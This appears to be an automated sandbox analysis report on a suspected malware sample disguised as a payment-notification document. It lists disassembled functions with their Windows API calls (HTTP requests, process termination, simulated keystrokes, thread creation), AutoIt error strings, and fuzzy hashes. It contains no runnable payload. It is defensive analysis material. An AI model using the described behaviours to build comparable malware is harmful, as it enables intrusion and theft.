                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                              • String ID: *.*
                                                                              • API String ID: 769691225-438819550
                                                                              • Opcode ID: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
                                                                              • Instruction ID: e3fd8b3d53bcd208d009c212489cd07463d19cc7ba447c093632459f92bf3a8b
                                                                              • Opcode Fuzzy Hash: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
                                                                              • Instruction Fuzzy Hash: E28190725083419BCB20DF56D845AAAF3E8BB85311F144C5EFC85D7260EB34DE4D8B52
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 008E5C7A
                                                                                • Part of subcall function 008E5D0A: GetClientRect.USER32(?,?), ref: 008E5D30
                                                                                • Part of subcall function 008E5D0A: GetWindowRect.USER32(?,?), ref: 008E5D71
                                                                                • Part of subcall function 008E5D0A: ScreenToClient.USER32(?,?), ref: 008E5D99
                                                                              • GetDC.USER32 ref: 009246F5
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00924708
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00924716
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0092472B
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00924733
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009247C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
                                                                              • Instruction ID: f459a7a427666343664f9d688d80406d02b1a59f98d127a5e1753c2340b8962d
                                                                              • Opcode Fuzzy Hash: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
                                                                              • Instruction Fuzzy Hash: C6710431500249DFCF21CF64E984AFA3BB9FF4A324F244269ED659A1AAC7319C81DF50
                                                                              APIs
                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009535E4
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • LoadStringW.USER32(009B2390,?,00000FFF,?), ref: 0095360A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString$_wcslen
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 4099089115-2391861430
                                                                              • Opcode ID: a52e9df5c2f92e6a625220eacc2b47603e1e36c7c3b204c8070ee5a1df49b4bd
                                                                              • Instruction ID: d9dd0f9dc69d9fe614366c1bad60d1bb7750b34158ba56aa9acb4e9c4654fadc
                                                                              • Opcode Fuzzy Hash: a52e9df5c2f92e6a625220eacc2b47603e1e36c7c3b204c8070ee5a1df49b4bd
                                                                              • Instruction Fuzzy Hash: 4E519C72C00249BADF15EBA5DC42EEEBB78FF45340F544125F505B21A1EB302B98DBA1
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C29A
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C2CA
                                                                              • GetLastError.KERNEL32 ref: 0095C322
                                                                              • SetEvent.KERNEL32(?), ref: 0095C336
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0095C341
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3113390036-3916222277
                                                                              • Opcode ID: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
                                                                              • Instruction ID: 4293d18563b53860700ae48e82032d2879504f4939a338aae23fe367051d770d
                                                                              • Opcode Fuzzy Hash: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
                                                                              • Instruction Fuzzy Hash: 9B316DF2504308AFD721DF668C89AAB7AFCEB49745F10851DF84A92211DB34DD489B60
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00923AAF,?,?,Bad directive syntax error,0097CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009498BC
                                                                              • LoadStringW.USER32(00000000,?,00923AAF,?), ref: 009498C3
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00949987
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 858772685-4153970271
                                                                              • Opcode ID: 15559d1e8cac705c87302d28aadddfac46a022ba58ff928457eef56ebf11ff8d
                                                                              • Instruction ID: 59195ba2c020c15fb384158f5693e5e2e07427437e3bef362e34760ef28e4804
                                                                              • Opcode Fuzzy Hash: 15559d1e8cac705c87302d28aadddfac46a022ba58ff928457eef56ebf11ff8d
                                                                              • Instruction Fuzzy Hash: DE21A332C0025EBBCF15AF94CC0AEEE7779FF19304F044829F515A60A2EB719A58DB61
                                                                              APIs
                                                                              • GetParent.USER32 ref: 009420AB
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 009420C0
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0094214D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1290815626-3381328864
                                                                              • Opcode ID: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
                                                                              • Instruction ID: 98fbf9e1045b1022db972303336458c94e90937eaa2e856b8f3de4a620b66834
                                                                              • Opcode Fuzzy Hash: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
                                                                              • Instruction Fuzzy Hash: F8110AB678C707B9F6152324DC06DE6379CEB4A729B61001AF704A50D1EA6558415664
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
                                                                              • Instruction ID: 17826d97d57f9a2a409723b572868fd289e4cfc2c62325ecba2a569268ee59c6
                                                                              • Opcode Fuzzy Hash: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
                                                                              • Instruction Fuzzy Hash: BFC1E274F0424DAFDB21EFA8D851BEEBBB4AF4D310F184199E415A7392C7349982DB60
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                              • String ID:
                                                                              • API String ID: 1282221369-0
                                                                              • Opcode ID: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
                                                                              • Instruction ID: b10a61167c78928759c3c90e78c1cb754dd7cdf11b36f0edd9d2007a50960797
                                                                              • Opcode Fuzzy Hash: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
                                                                              • Instruction Fuzzy Hash: D86138B1B4430CAFDB21AFB49941BEA7BA9AF85320F04416DF941973C1D6319D82D750
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00975186
                                                                              • ShowWindow.USER32(?,00000000), ref: 009751C7
                                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 009751CD
                                                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 009751D1
                                                                                • Part of subcall function 00976FBA: DeleteObject.GDI32(00000000), ref: 00976FE6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0097520D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0097521A
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0097524D
                                                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00975287
                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00975296
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                              • String ID:
                                                                              • API String ID: 3210457359-0
                                                                              • Opcode ID: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
                                                                              • Instruction ID: 1c1a24fba45bb68cc614f4c831a1d6aef6f4f3d3a593ee36e7cbf6ea0ad764b9
                                                                              • Opcode Fuzzy Hash: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
                                                                              • Instruction Fuzzy Hash: 8051C272A58A08BEEF609F24CC46B983B69FB05322F55C005F62C962E1C7B5E980DB41
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00936890
                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009368A9
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009368B9
                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009368D1
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009368F2
                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00936901
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093691E
                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0093692D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                              • String ID:
                                                                              • API String ID: 1268354404-0
                                                                              • Opcode ID: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
                                                                              • Instruction ID: 9c4f5e64df5b05725436444845131057af769675a71874d03199d90dee5110ef
                                                                              • Opcode Fuzzy Hash: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
                                                                              • Instruction Fuzzy Hash: 195168B1610209EFDB24CF25CC95BAA7BB5FB48760F104518FA56D72A0DB70E990DB50
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C182
                                                                              • GetLastError.KERNEL32 ref: 0095C195
                                                                              • SetEvent.KERNEL32(?), ref: 0095C1A9
                                                                                • Part of subcall function 0095C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
                                                                                • Part of subcall function 0095C253: GetLastError.KERNEL32 ref: 0095C322
                                                                                • Part of subcall function 0095C253: SetEvent.KERNEL32(?), ref: 0095C336
                                                                                • Part of subcall function 0095C253: InternetCloseHandle.WININET(00000000), ref: 0095C341
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                              • String ID:
                                                                              • API String ID: 337547030-0
                                                                              • Opcode ID: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
                                                                              • Instruction ID: 0f2b23a9740c96e01cc2da8f24400dd22d5ccdb5deb80c8f0175f09d98898de9
                                                                              • Opcode Fuzzy Hash: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
                                                                              • Instruction Fuzzy Hash: EF317CB1204701AFDB21DFA6DC44A66BBEDFF58312F00441DF96A86611DB34E858ABA0
                                                                              APIs
                                                                                • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                                • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                                • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009425BD
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009425DB
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009425DF
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009425E9
                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00942601
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00942605
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0094260F
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00942623
                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00942627
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
                                                                              • Instruction ID: 4d9cdf693725b0f06d960dfcc256a99f7ea70c7d4a47327737e4355466648742
                                                                              • Opcode Fuzzy Hash: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
                                                                              • Instruction Fuzzy Hash: EE01D871398210BBFB1067689C8AF593F59DF8EB11F500015F318AE0D1C9E11484DA69
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00941449,?,?,00000000), ref: 0094180C
                                                                              • HeapAlloc.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941813
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941828
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00941449,?,?,00000000), ref: 00941830
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941833
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941843
                                                                              • GetCurrentProcess.KERNEL32(00941449,00000000,?,00941449,?,?,00000000), ref: 0094184B
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 0094184E
                                                                              • CreateThread.KERNEL32(00000000,00000000,00941874,00000000,00000000,00000000), ref: 00941868
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
                                                                              • Instruction ID: c5b06ff83c779dde5d6ff82a00e3354852451d86fd312557916b897b510eca49
                                                                              • Opcode Fuzzy Hash: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
                                                                              • Instruction Fuzzy Hash: E501BFB6254304FFE710AB65DC4DF573B6CEB89B11F404425FA05DB191CA709840DB20
                                                                              APIs
                                                                                • Part of subcall function 0094D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
                                                                                • Part of subcall function 0094D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
                                                                                • Part of subcall function 0094D4DC: CloseHandle.KERNEL32(00000000), ref: 0094D5DC
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A16D
                                                                              • GetLastError.KERNEL32 ref: 0096A180
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A1B3
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0096A268
                                                                              • GetLastError.KERNEL32(00000000), ref: 0096A273
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0096A2C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
                                                                              • Instruction ID: ee0a297b16cbb9a84607fe3d43ee97921810ef675fdc45366d329401e4758ded
                                                                              • Opcode Fuzzy Hash: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
                                                                              • Instruction Fuzzy Hash: 5F61DE712082429FD320DF19C894F16BBE5AF45318F14849CE46A9B7A3C776EC85CF92
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00973925
                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0097393A
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00973954
                                                                              • _wcslen.LIBCMT ref: 00973999
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 009739C6
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009739F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
